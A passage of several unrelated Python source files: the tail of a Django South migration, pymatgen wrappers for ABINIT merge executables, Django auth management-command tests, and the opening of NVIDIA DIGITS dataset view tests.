'Meta': {'object_name': 'Hallway', '_ormbases': ['core.BaseHallway']},
u'basehallway_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.BaseHallway']", 'unique': 'True', 'primary_key': 'True'}),
'ceiling': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'floor': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'wall': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
u'core.kitchen': {
'Meta': {'object_name': 'Kitchen', '_ormbases': ['core.BaseKitchen']},
u'basekitchen_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.BaseKitchen']", 'unique': 'True', 'primary_key': 'True'}),
'ceiling': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'floor': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'stove': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'wall': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
u'core.room': {
'Meta': {'object_name': 'Room', '_ormbases': ['core.BaseRoom']},
u'baseroom_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.BaseRoom']", 'unique': 'True', 'primary_key': 'True'}),
'ceiling': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'floor': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'wall': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
u'core.wc': {
'Meta': {'object_name': 'WC', '_ormbases': ['core.BaseWC']},
u'basewc_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.BaseWC']", 'unique': 'True', 'primary_key': 'True'}),
'ceiling': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'floor': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'separate': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'wall': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
'mo.mo': {
'Meta': {'object_name': 'MO'},
'common_amount': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'common_economy': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'common_percentage': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'common_spent': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'creation_form': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '24', 'null': 'True', 'blank': 'True'}),
'has_trouble': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'home_orphans': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '2048'})
}
}
complete_apps = ['build']
|
|
# coding: utf-8
"""Wrappers for ABINIT main executables"""
from __future__ import unicode_literals, division, print_function
import os
from subprocess import Popen, PIPE
from monty.os.path import which
from pymatgen.util.string_utils import list_strings
from six.moves import map, cStringIO
import logging
logger = logging.getLogger(__name__)
__author__ = "Matteo Giantomassi"
__copyright__ = "Copyright 2013, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Matteo Giantomassi"
__email__ = "gmatteo at gmail.com"
__status__ = "Development"
__date__ = "$Feb 21, 2013M$"
__all__ = [
"Mrgscr",
"Mrggkk",
"Mrgddb",
"Anaddb",
]
class ExecWrapper(object):
"""This class runs an executable in a subprocess."""
def __init__(self, executable=None, verbose=0):
"""
Args:
executable:
path to the executable.
verbose:
Verbosity level.
"""
if executable is None:
executable = self.name
self.executable = which(executable)
self.verbose = int(verbose)
if self.executable is None:
msg = "Cannot find executable %s is PATH\n Use export PATH=/dir_with_exec:$PATH" % executable
raise self.Error(msg)
assert os.path.basename(self.executable) == self.name
def __str__(self):
return "%s" % self.executable
def set_mpi_runner(self, mpi_runner="mpirun"):
# TODO better treatment of mpirunner syntax.
self._mpi_runner = mpi_runner
@property
def mpi_runner(self):
try:
return self._mpi_runner
except AttributeError:
return ""
@property
def name(self):
return self._name
def execute(self, cwd=None):
# Try to execute binary without and with mpirun.
try:
self._execute(cwd=cwd, with_mpirun=False)
except self.Error:
self._execute(cwd=cwd, with_mpirun=True)
def _execute(self, cwd=None, with_mpirun=False):
"""
Execute the executable in a subprocess.
"""
args = [self.executable, "<", self.stdin_fname, ">", self.stdout_fname, "2>", self.stderr_fname]
if self.mpi_runner and with_mpirun:
args.insert(0, self.mpi_runner)
self.cmd_str = " ".join(args)
p = Popen(self.cmd_str, shell=True, stdout=PIPE, stderr=PIPE, cwd=cwd)
self.stdout_data, self.stderr_data = p.communicate()
self.returncode = p.returncode
if self.returncode != 0:
with open(self.stdout_fname, "r") as out, open(self.stderr_fname, "r") as err:
self.stdout_data = out.read()
self.stderr_data = err.read()
if self.verbose:
print("*** stdout: ***\n", self.stdout_data)
print("*** stderr ***\n", self.stderr_data)
raise self.Error("%s returned %s\n cmd_str: %s" % (self, self.returncode, self.cmd_str))
class MrgscrError(Exception):
"""Error class for Mrgscr"""
class Mrgscr(ExecWrapper):
_name = "mrgscr"
Error = MrgscrError
def merge_qpoints(self, files_to_merge, out_prefix, cwd=None):
"""
        Execute mrgscr in a subprocess to merge files_to_merge. Produce a new file with prefix out_prefix.
If cwd is not None, the child's current directory will be changed to cwd before it is executed.
"""
# We work with absolute paths.
files_to_merge = [os.path.abspath(s) for s in list_strings(files_to_merge)]
nfiles = len(files_to_merge)
if self.verbose:
print("Will merge %d files with output_prefix %s" % (nfiles, out_prefix))
for (i, f) in enumerate(files_to_merge):
print(" [%d] %s" % (i, f))
if nfiles == 1:
raise self.Error("merge_qpoints does not support nfiles == 1")
self.stdin_fname, self.stdout_fname, self.stderr_fname = (
"mrgscr.stdin", "mrgscr.stdout", "mrgscr.stderr")
if cwd is not None:
self.stdin_fname, self.stdout_fname, self.stderr_fname = \
map(os.path.join, 3 * [cwd], [self.stdin_fname, self.stdout_fname, self.stderr_fname])
inp = cStringIO()
inp.write(str(nfiles) + "\n") # Number of files to merge.
inp.write(out_prefix + "\n") # Prefix for the final output file:
for filename in files_to_merge:
inp.write(filename + "\n") # List with the files to merge.
inp.write("1\n") # Option for merging q-points.
self.stdin_data = [s for s in inp.getvalue()]
with open(self.stdin_fname, "w") as fh:
fh.writelines(self.stdin_data)
        self.execute(cwd=cwd)
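# A minimal usage sketch for Mrgscr (hypothetical file names; the mrgscr
# executable must be discoverable in $PATH for the wrapper to be constructed):
#
#   mrgscr = Mrgscr(verbose=1)
#   mrgscr.merge_qpoints(["run1_SCR", "run2_SCR"], out_prefix="merged_SCR", cwd="workdir")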
class MrggkkError(Exception):
"""Error class for Mrggkk."""
class Mrggkk(ExecWrapper):
_name = "mrggkk"
Error = MrggkkError
def merge(self, gswfk_file, dfpt_files, gkk_files, out_gkk, binascii=0, cwd=None):
"""
        Merge GKK files, return the absolute path of the new database.
Args:
gswfk_file:
Ground-state WFK filename
dfpt_files:
List of 1WFK files to merge.
gkk_files:
List of GKK files to merge.
out_gkk:
Name of the output GKK file
binascii:
                Integer flag. 0 --> binary output, 1 --> ascii formatted output
cwd:
Directory where the subprocess will be executed.
"""
raise NotImplementedError("This method should be tested")
out_gkk = out_gkk if cwd is None else os.path.join(os.path.abspath(cwd), out_gkk)
# We work with absolute paths.
        gswfk_file = os.path.abspath(gswfk_file)
dfpt_files = [os.path.abspath(s) for s in list_strings(dfpt_files)]
gkk_files = [os.path.abspath(s) for s in list_strings(gkk_files)]
if self.verbose:
print("Will merge %d 1WF files, %d GKK file in output %s" %
(len(dfpt_nfiles), len_gkk_files, out_gkk))
for (i, f) in enumerate(dfpt_files):
print(" [%d] 1WF %s" % (i, f))
for (i, f) in enumerate(gkk_files):
print(" [%d] GKK %s" % (i, f))
self.stdin_fname, self.stdout_fname, self.stderr_fname = (
"mrggkk.stdin", "mrggkk.stdout", "mrggkk.stderr")
if cwd is not None:
self.stdin_fname, self.stdout_fname, self.stderr_fname = \
map(os.path.join, 3 * [cwd], [self.stdin_fname, self.stdout_fname, self.stderr_fname])
inp = cStringIO()
inp.write(out_gkk + "\n") # Name of the output file
inp.write(str(binascii) + "\n") # Integer flag: 0 --> binary output, 1 --> ascii formatted output
        inp.write(gswfk_file + "\n") # Name of the ground state wavefunction file WF
        #dims = len(dfpt_files, gkk_files, ?)
        # FIXME: the last value (the number of 1WF files stored in all the GKK files)
        # is not known at this point; 0 is a placeholder until this method is completed.
        dims = (len(dfpt_files), len(gkk_files), 0)
        dims = " ".join([str(d) for d in dims])
        inp.write(dims + "\n") # Number of 1WF, of GKK files, and number of 1WF files in all the GKK files
# Names of the 1WF files...
for fname in dfpt_files:
inp.write(fname + "\n")
# Names of the GKK files...
for fname in gkk_files:
inp.write(fname + "\n")
self.stdin_data = [s for s in inp.getvalue()]
with open(self.stdin_fname, "w") as fh:
fh.writelines(self.stdin_data)
        self.execute(cwd=cwd)
return out_gkk
class MrgddbError(Exception):
"""Error class for Mrgddb."""
class Mrgddb(ExecWrapper):
_name = "mrgddb"
Error = MrgddbError
def merge(self, ddb_files, out_ddb, description, cwd=None):
"""Merge DDB file, return the absolute path of the new database."""
# We work with absolute paths.
ddb_files = [os.path.abspath(s) for s in list_strings(ddb_files)]
out_ddb = out_ddb if cwd is None else os.path.join(os.path.abspath(cwd), out_ddb)
if self.verbose:
print("Will merge %d files into output DDB %s" % (len(ddb_files), out_ddb))
for (i, f) in enumerate(ddb_files):
print(" [%d] %s" % (i, f))
# Handle the case of a single file since mrgddb uses 1 to denote GS files!
if len(ddb_files) == 1:
with open(ddb_files[0], "r") as inh, open(out_ddb, "w") as out:
for line in inh:
out.write(line)
return out_ddb
self.stdin_fname, self.stdout_fname, self.stderr_fname = (
"mrgddb.stdin", "mrgddb.stdout", "mrgddb.stderr")
if cwd is not None:
self.stdin_fname, self.stdout_fname, self.stderr_fname = \
map(os.path.join, 3 * [cwd], [self.stdin_fname, self.stdout_fname, self.stderr_fname])
inp = cStringIO()
inp.write(out_ddb + "\n") # Name of the output file.
inp.write(str(description) + "\n") # Description.
inp.write(str(len(ddb_files)) + "\n") # Number of input DDBs.
# Names of the DDB files.
for fname in ddb_files:
inp.write(fname + "\n")
self.stdin_data = [s for s in inp.getvalue()]
with open(self.stdin_fname, "w") as fh:
fh.writelines(self.stdin_data)
        self.execute(cwd=cwd)
return out_ddb
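# A minimal usage sketch for Mrgddb (hypothetical file names; the mrgddb
# executable must be discoverable in $PATH):
#
#   mrgddb = Mrgddb(verbose=1)
#   out_path = mrgddb.merge(["run1_DDB", "run2_DDB"], out_ddb="merged_DDB",
#                           description="Merged DDB", cwd="workdir")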
|
|
from __future__ import unicode_literals
import locale
import sys
from datetime import date
from django.apps import apps
from django.contrib.auth import management, models
from django.contrib.auth.checks import check_user_model
from django.contrib.auth.management import create_permissions
from django.contrib.auth.management.commands import (
changepassword, createsuperuser,
)
from django.contrib.auth.models import Group, User
from django.contrib.auth.tests.custom_user import CustomUser
from django.contrib.contenttypes.models import ContentType
from django.core import checks, exceptions
from django.core.management import call_command
from django.core.management.base import CommandError
from django.test import TestCase, override_settings, override_system_checks
from django.utils import six
from django.utils.encoding import force_str
from django.utils.translation import ugettext_lazy as _
from .models import (
CustomUserBadRequiredFields, CustomUserNonListRequiredFields,
CustomUserNonUniqueUsername, CustomUserWithFK, Email,
)
def mock_inputs(inputs):
"""
Decorator to temporarily replace input/getpass to allow interactive
createsuperuser.
"""
def inner(test_func):
def wrapped(*args):
class mock_getpass:
@staticmethod
def getpass(prompt=b'Password: ', stream=None):
if six.PY2:
# getpass on Windows only supports prompt as bytestring (#19807)
assert isinstance(prompt, six.binary_type)
return inputs['password']
def mock_input(prompt):
# prompt should be encoded in Python 2. This line will raise an
# Exception if prompt contains unencoded non-ASCII on Python 2.
prompt = str(prompt)
assert str('__proxy__') not in prompt
response = ''
for key, val in inputs.items():
if force_str(key) in prompt.lower():
response = val
break
return response
old_getpass = createsuperuser.getpass
old_input = createsuperuser.input
createsuperuser.getpass = mock_getpass
createsuperuser.input = mock_input
try:
test_func(*args)
finally:
createsuperuser.getpass = old_getpass
createsuperuser.input = old_input
return wrapped
return inner
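# A usage sketch (mirroring how the decorator is applied further below): any
# prompt whose lowercased text contains a key of the dict is answered with the
# corresponding value, and the 'password' key feeds the mocked getpass.
#
# @mock_inputs({'password': 'nopasswd', 'email': 'joe@somewhere.org'})
# def test_something(self):
#     call_command('createsuperuser', interactive=True, stdin=MockTTY())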
class MockTTY(object):
"""
A fake stdin object that pretends to be a TTY to be used in conjunction
with mock_inputs.
"""
def isatty(self):
return True
class GetDefaultUsernameTestCase(TestCase):
def setUp(self):
self.old_get_system_username = management.get_system_username
def tearDown(self):
management.get_system_username = self.old_get_system_username
def test_actual_implementation(self):
self.assertIsInstance(management.get_system_username(), six.text_type)
def test_simple(self):
management.get_system_username = lambda: 'joe'
self.assertEqual(management.get_default_username(), 'joe')
def test_existing(self):
models.User.objects.create(username='joe')
management.get_system_username = lambda: 'joe'
self.assertEqual(management.get_default_username(), '')
self.assertEqual(
management.get_default_username(check_db=False), 'joe')
def test_i18n(self):
# 'Julia' with accented 'u':
management.get_system_username = lambda: 'J\xfalia'
self.assertEqual(management.get_default_username(), 'julia')
class ChangepasswordManagementCommandTestCase(TestCase):
def setUp(self):
self.user = models.User.objects.create_user(username='joe', password='qwerty')
self.stdout = six.StringIO()
self.stderr = six.StringIO()
def tearDown(self):
self.stdout.close()
self.stderr.close()
def test_that_changepassword_command_changes_joes_password(self):
"Executing the changepassword management command should change joe's password"
self.assertTrue(self.user.check_password('qwerty'))
command = changepassword.Command()
command._get_pass = lambda *args: 'not qwerty'
command.execute(username="joe", stdout=self.stdout)
command_output = self.stdout.getvalue().strip()
self.assertEqual(
command_output,
"Changing password for user 'joe'\nPassword changed successfully for user 'joe'"
)
self.assertTrue(models.User.objects.get(username="joe").check_password("not qwerty"))
def test_that_max_tries_exits_1(self):
"""
A CommandError should be thrown by handle() if the user enters in
mismatched passwords three times.
"""
command = changepassword.Command()
command._get_pass = lambda *args: args or 'foo'
with self.assertRaises(CommandError):
command.execute(username="joe", stdout=self.stdout, stderr=self.stderr)
def test_that_changepassword_command_works_with_nonascii_output(self):
"""
#21627 -- Executing the changepassword management command should allow
non-ASCII characters from the User object representation.
"""
# 'Julia' with accented 'u':
models.User.objects.create_user(username='J\xfalia', password='qwerty')
command = changepassword.Command()
command._get_pass = lambda *args: 'not qwerty'
command.execute(username="J\xfalia", stdout=self.stdout)
@override_settings(SILENCED_SYSTEM_CHECKS=['fields.W342']) # ForeignKey(unique=True)
class CreatesuperuserManagementCommandTestCase(TestCase):
def test_basic_usage(self):
"Check the operation of the createsuperuser management command"
# We can use the management command to create a superuser
new_io = six.StringIO()
call_command(
"createsuperuser",
interactive=False,
username="joe",
email="joe@somewhere.org",
stdout=new_io
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
u = User.objects.get(username="joe")
self.assertEqual(u.email, 'joe@somewhere.org')
# created password should be unusable
self.assertFalse(u.has_usable_password())
@mock_inputs({'password': "nopasswd"})
def test_nolocale(self):
"""
Check that createsuperuser does not break when no locale is set. See
ticket #16017.
"""
old_getdefaultlocale = locale.getdefaultlocale
try:
# Temporarily remove locale information
locale.getdefaultlocale = lambda: (None, None)
# Call the command in this new environment
call_command(
"createsuperuser",
interactive=True,
username="nolocale@somewhere.org",
email="nolocale@somewhere.org",
verbosity=0,
stdin=MockTTY(),
)
except TypeError:
self.fail("createsuperuser fails if the OS provides no information about the current locale")
finally:
# Re-apply locale information
locale.getdefaultlocale = old_getdefaultlocale
# If we were successful, a user should have been created
u = User.objects.get(username="nolocale@somewhere.org")
self.assertEqual(u.email, 'nolocale@somewhere.org')
@mock_inputs({
'password': "nopasswd",
'u\u017eivatel': 'foo', # username (cz)
'email': 'nolocale@somewhere.org'})
def test_non_ascii_verbose_name(self):
username_field = User._meta.get_field('username')
old_verbose_name = username_field.verbose_name
username_field.verbose_name = _('u\u017eivatel')
new_io = six.StringIO()
try:
call_command(
"createsuperuser",
interactive=True,
stdout=new_io,
stdin=MockTTY(),
)
finally:
username_field.verbose_name = old_verbose_name
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
def test_verbosity_zero(self):
# We can suppress output on the management command
new_io = six.StringIO()
call_command(
"createsuperuser",
interactive=False,
username="joe2",
email="joe2@somewhere.org",
verbosity=0,
stdout=new_io
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, '')
u = User.objects.get(username="joe2")
self.assertEqual(u.email, 'joe2@somewhere.org')
self.assertFalse(u.has_usable_password())
def test_email_in_username(self):
new_io = six.StringIO()
call_command(
"createsuperuser",
interactive=False,
username="joe+admin@somewhere.org",
email="joe@somewhere.org",
stdout=new_io
)
u = User._default_manager.get(username="joe+admin@somewhere.org")
self.assertEqual(u.email, 'joe@somewhere.org')
self.assertFalse(u.has_usable_password())
@override_settings(AUTH_USER_MODEL='auth.CustomUser')
def test_swappable_user(self):
"A superuser can be created when a custom User model is in use"
# We can use the management command to create a superuser
# We skip validation because the temporary substitution of the
# swappable User model messes with validation.
new_io = six.StringIO()
call_command(
"createsuperuser",
interactive=False,
email="joe@somewhere.org",
date_of_birth="1976-04-01",
stdout=new_io,
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
u = CustomUser._default_manager.get(email="joe@somewhere.org")
self.assertEqual(u.date_of_birth, date(1976, 4, 1))
# created password should be unusable
self.assertFalse(u.has_usable_password())
@override_settings(AUTH_USER_MODEL='auth.CustomUser')
def test_swappable_user_missing_required_field(self):
"A Custom superuser won't be created when a required field isn't provided"
# We can use the management command to create a superuser
# We skip validation because the temporary substitution of the
# swappable User model messes with validation.
new_io = six.StringIO()
with self.assertRaises(CommandError):
call_command(
"createsuperuser",
interactive=False,
username="joe@somewhere.org",
stdout=new_io,
stderr=new_io,
)
self.assertEqual(CustomUser._default_manager.count(), 0)
def test_skip_if_not_in_TTY(self):
"""
If the command is not called from a TTY, it should be skipped and a
message should be displayed (#7423).
"""
class FakeStdin(object):
"""A fake stdin object that has isatty() return False."""
def isatty(self):
return False
out = six.StringIO()
call_command(
"createsuperuser",
stdin=FakeStdin(),
stdout=out,
interactive=True,
)
self.assertEqual(User._default_manager.count(), 0)
self.assertIn("Superuser creation skipped", out.getvalue())
def test_passing_stdin(self):
"""
You can pass a stdin object as an option and it should be
available on self.stdin.
If no such option is passed, it defaults to sys.stdin.
"""
sentinel = object()
command = createsuperuser.Command()
command.check = lambda: []
command.execute(
stdin=sentinel,
stdout=six.StringIO(),
stderr=six.StringIO(),
interactive=False,
verbosity=0,
username='janet',
email='janet@example.com',
)
self.assertIs(command.stdin, sentinel)
command = createsuperuser.Command()
command.check = lambda: []
command.execute(
stdout=six.StringIO(),
stderr=six.StringIO(),
interactive=False,
verbosity=0,
username='joe',
email='joe@example.com',
)
self.assertIs(command.stdin, sys.stdin)
@override_settings(AUTH_USER_MODEL='auth.CustomUserWithFK')
def test_fields_with_fk(self):
new_io = six.StringIO()
group = Group.objects.create(name='mygroup')
email = Email.objects.create(email='mymail@gmail.com')
call_command(
'createsuperuser',
interactive=False,
username=email.pk,
email=email.email,
group=group.pk,
stdout=new_io,
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
u = CustomUserWithFK._default_manager.get(email=email)
self.assertEqual(u.username, email)
self.assertEqual(u.group, group)
non_existent_email = 'mymail2@gmail.com'
with self.assertRaisesMessage(CommandError,
'email instance with email %r does not exist.' % non_existent_email):
call_command(
'createsuperuser',
interactive=False,
username=email.pk,
email=non_existent_email,
stdout=new_io,
)
@override_settings(AUTH_USER_MODEL='auth.CustomUserWithFK')
def test_fields_with_fk_interactive(self):
new_io = six.StringIO()
group = Group.objects.create(name='mygroup')
email = Email.objects.create(email='mymail@gmail.com')
@mock_inputs({
'password': 'nopasswd',
'username (email.id)': email.pk,
'email (email.email)': email.email,
'group (group.id)': group.pk,
})
def test(self):
call_command(
'createsuperuser',
interactive=True,
stdout=new_io,
stdin=MockTTY(),
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
u = CustomUserWithFK._default_manager.get(email=email)
self.assertEqual(u.username, email)
self.assertEqual(u.group, group)
test(self)
class CustomUserModelValidationTestCase(TestCase):
@override_settings(AUTH_USER_MODEL='auth.CustomUserNonListRequiredFields')
@override_system_checks([check_user_model])
def test_required_fields_is_list(self):
"REQUIRED_FIELDS should be a list."
errors = checks.run_checks()
expected = [
checks.Error(
"'REQUIRED_FIELDS' must be a list or tuple.",
hint=None,
obj=CustomUserNonListRequiredFields,
id='auth.E001',
),
]
self.assertEqual(errors, expected)
@override_settings(AUTH_USER_MODEL='auth.CustomUserBadRequiredFields')
@override_system_checks([check_user_model])
def test_username_not_in_required_fields(self):
"USERNAME_FIELD should not appear in REQUIRED_FIELDS."
errors = checks.run_checks()
expected = [
checks.Error(
("The field named as the 'USERNAME_FIELD' for a custom user model "
"must not be included in 'REQUIRED_FIELDS'."),
hint=None,
obj=CustomUserBadRequiredFields,
id='auth.E002',
),
]
self.assertEqual(errors, expected)
@override_settings(AUTH_USER_MODEL='auth.CustomUserNonUniqueUsername')
@override_system_checks([check_user_model])
def test_username_non_unique(self):
"A non-unique USERNAME_FIELD should raise a model validation error."
errors = checks.run_checks()
expected = [
checks.Error(
("'CustomUserNonUniqueUsername.username' must be "
"unique because it is named as the 'USERNAME_FIELD'."),
hint=None,
obj=CustomUserNonUniqueUsername,
id='auth.E003',
),
]
self.assertEqual(errors, expected)
@override_settings(AUTH_USER_MODEL='auth.CustomUserNonUniqueUsername',
AUTHENTICATION_BACKENDS=[
'my.custom.backend',
])
@override_system_checks([check_user_model])
def test_username_non_unique_with_custom_backend(self):
""" A non-unique USERNAME_FIELD should raise an error only if we use the
        default authentication backend. Otherwise, a warning should be raised.
"""
errors = checks.run_checks()
expected = [
checks.Warning(
("'CustomUserNonUniqueUsername.username' is named as "
"the 'USERNAME_FIELD', but it is not unique."),
hint=('Ensure that your authentication backend(s) can handle '
'non-unique usernames.'),
obj=CustomUserNonUniqueUsername,
id='auth.W004',
)
]
self.assertEqual(errors, expected)
class PermissionTestCase(TestCase):
def setUp(self):
self._original_permissions = models.Permission._meta.permissions[:]
self._original_default_permissions = models.Permission._meta.default_permissions
self._original_verbose_name = models.Permission._meta.verbose_name
def tearDown(self):
models.Permission._meta.permissions = self._original_permissions
models.Permission._meta.default_permissions = self._original_default_permissions
models.Permission._meta.verbose_name = self._original_verbose_name
ContentType.objects.clear_cache()
def test_duplicated_permissions(self):
"""
Test that we show proper error message if we are trying to create
duplicate permissions.
"""
auth_app_config = apps.get_app_config('auth')
# check duplicated default permission
models.Permission._meta.permissions = [
('change_permission', 'Can edit permission (duplicate)')]
six.assertRaisesRegex(self, CommandError,
"The permission codename 'change_permission' clashes with a "
"builtin permission for model 'auth.Permission'.",
create_permissions, auth_app_config, verbosity=0)
# check duplicated custom permissions
models.Permission._meta.permissions = [
('my_custom_permission', 'Some permission'),
('other_one', 'Some other permission'),
('my_custom_permission', 'Some permission with duplicate permission code'),
]
six.assertRaisesRegex(self, CommandError,
"The permission codename 'my_custom_permission' is duplicated for model "
"'auth.Permission'.",
create_permissions, auth_app_config, verbosity=0)
# should not raise anything
models.Permission._meta.permissions = [
('my_custom_permission', 'Some permission'),
('other_one', 'Some other permission'),
]
create_permissions(auth_app_config, verbosity=0)
def test_default_permissions(self):
auth_app_config = apps.get_app_config('auth')
permission_content_type = ContentType.objects.get_by_natural_key('auth', 'permission')
models.Permission._meta.permissions = [
('my_custom_permission', 'Some permission'),
]
create_permissions(auth_app_config, verbosity=0)
# add/change/delete permission by default + custom permission
self.assertEqual(models.Permission.objects.filter(
content_type=permission_content_type,
).count(), 4)
models.Permission.objects.filter(content_type=permission_content_type).delete()
models.Permission._meta.default_permissions = []
create_permissions(auth_app_config, verbosity=0)
# custom permission only since default permissions is empty
self.assertEqual(models.Permission.objects.filter(
content_type=permission_content_type,
).count(), 1)
def test_verbose_name_length(self):
auth_app_config = apps.get_app_config('auth')
permission_content_type = ContentType.objects.get_by_natural_key('auth', 'permission')
models.Permission.objects.filter(content_type=permission_content_type).delete()
models.Permission._meta.verbose_name = "some ridiculously long verbose name that is out of control" * 5
six.assertRaisesRegex(self, exceptions.ValidationError,
"The verbose_name of auth.permission is longer than 244 characters",
create_permissions, auth_app_config, verbosity=0)
|
|
# Copyright (c) 2014-2016, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import
import json
import os
import shutil
import tempfile
# Find the best implementation available
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
from bs4 import BeautifulSoup
import PIL.Image
from .test_imageset_creator import create_classification_imageset
from digits import test_utils
import digits.test_views
# May be too short on a slow system
TIMEOUT_DATASET = 45
################################################################################
# Base classes (they don't start with "Test" so nose won't run them)
################################################################################
class BaseViewsTest(digits.test_views.BaseViewsTest):
"""
Provides some functions
"""
@classmethod
def dataset_exists(cls, job_id):
return cls.job_exists(job_id, 'datasets')
@classmethod
def dataset_status(cls, job_id):
return cls.job_status(job_id, 'datasets')
@classmethod
def dataset_info(cls, job_id):
return cls.job_info(job_id, 'datasets')
@classmethod
def abort_dataset(cls, job_id):
return cls.abort_job(job_id, job_type='datasets')
@classmethod
def dataset_wait_completion(cls, job_id, **kwargs):
kwargs['job_type'] = 'datasets'
if 'timeout' not in kwargs:
kwargs['timeout'] = TIMEOUT_DATASET
return cls.job_wait_completion(job_id, **kwargs)
@classmethod
def delete_dataset(cls, job_id):
return cls.delete_job(job_id, job_type='datasets')
class BaseViewsTestWithImageset(BaseViewsTest):
"""
Provides an imageset and some functions
"""
# Inherited classes may want to override these default attributes
IMAGE_COUNT = 10 # per class
IMAGE_HEIGHT = 10
IMAGE_WIDTH = 10
IMAGE_CHANNELS = 3
BACKEND = 'lmdb'
ENCODING = 'png'
COMPRESSION = 'none'
UNBALANCED_CATEGORY = False
@classmethod
def setUpClass(cls):
super(BaseViewsTestWithImageset, cls).setUpClass()
cls.imageset_folder = tempfile.mkdtemp()
# create imageset
cls.imageset_paths = create_classification_imageset(
cls.imageset_folder,
image_count=cls.IMAGE_COUNT,
add_unbalanced_category=cls.UNBALANCED_CATEGORY,
)
cls.created_datasets = []
@classmethod
def tearDownClass(cls):
# delete any created datasets
for job_id in cls.created_datasets:
cls.delete_dataset(job_id)
# delete imageset
shutil.rmtree(cls.imageset_folder)
super(BaseViewsTestWithImageset, cls).tearDownClass()
@classmethod
def create_dataset(cls, **kwargs):
"""
Create a dataset
Returns the job_id
Raises RuntimeError if job fails to create
Keyword arguments:
**kwargs -- data to be sent with POST request
"""
data = {
'dataset_name': 'test_dataset',
'group_name': 'test_group',
'method': 'folder',
'folder_train': cls.imageset_folder,
'resize_channels': cls.IMAGE_CHANNELS,
'resize_width': cls.IMAGE_WIDTH,
'resize_height': cls.IMAGE_HEIGHT,
'backend': cls.BACKEND,
'encoding': cls.ENCODING,
'compression': cls.COMPRESSION,
}
data.update(kwargs)
request_json = data.pop('json', False)
url = '/datasets/images/classification'
if request_json:
url += '.json'
rv = cls.app.post(url, data=data)
if request_json:
if rv.status_code != 200:
print json.loads(rv.data)
raise RuntimeError('Model creation failed with %s' % rv.status_code)
return json.loads(rv.data)['id']
# expect a redirect
if not 300 <= rv.status_code <= 310:
s = BeautifulSoup(rv.data, 'html.parser')
div = s.select('div.alert-danger')
if div:
print div[0]
else:
print rv.data
raise RuntimeError('Failed to create dataset - status %s' % rv.status_code)
job_id = cls.job_id_from_response(rv)
assert cls.dataset_exists(job_id), 'dataset not found after successful creation'
cls.created_datasets.append(job_id)
return job_id
@classmethod
def categoryCount(cls):
return len(cls.imageset_paths.keys())
class BaseViewsTestWithDataset(BaseViewsTestWithImageset):
"""
Provides a dataset and some functions
"""
@classmethod
def setUpClass(cls):
super(BaseViewsTestWithDataset, cls).setUpClass()
cls.dataset_id = cls.create_dataset(json=True)
assert cls.dataset_wait_completion(cls.dataset_id) == 'Done', 'create failed'
def test_clone(self):
options_1 = {
'encoding': 'png',
'folder_pct_test': 0,
'folder_pct_val': 25,
'folder_test': '',
'folder_test_max_per_class': None,
'folder_test_min_per_class': 2,
'folder_train_max_per_class': 3,
'folder_train_min_per_class': 1,
'folder_val_max_per_class': None,
'folder_val_min_per_class': 2,
'resize_mode': 'half_crop',
}
job1_id = self.create_dataset(**options_1)
assert self.dataset_wait_completion(job1_id) == 'Done', 'first job failed'
rv = self.app.get('/datasets/%s.json' % job1_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content1 = json.loads(rv.data)
# Clone job1 as job2
options_2 = {
'clone': job1_id,
}
job2_id = self.create_dataset(**options_2)
assert self.dataset_wait_completion(job2_id) == 'Done', 'second job failed'
rv = self.app.get('/datasets/%s.json' % job2_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content2 = json.loads(rv.data)
# These will be different
content1.pop('id')
content2.pop('id')
content1.pop('directory')
content2.pop('directory')
assert (content1 == content2), 'job content does not match'
job1 = digits.webapp.scheduler.get_job(job1_id)
job2 = digits.webapp.scheduler.get_job(job2_id)
assert (job1.form_data == job2.form_data), 'form content does not match'
################################################################################
# Test classes
################################################################################
class TestViews(BaseViewsTest, test_utils.DatasetMixin):
"""
Tests which don't require an imageset or a dataset
"""
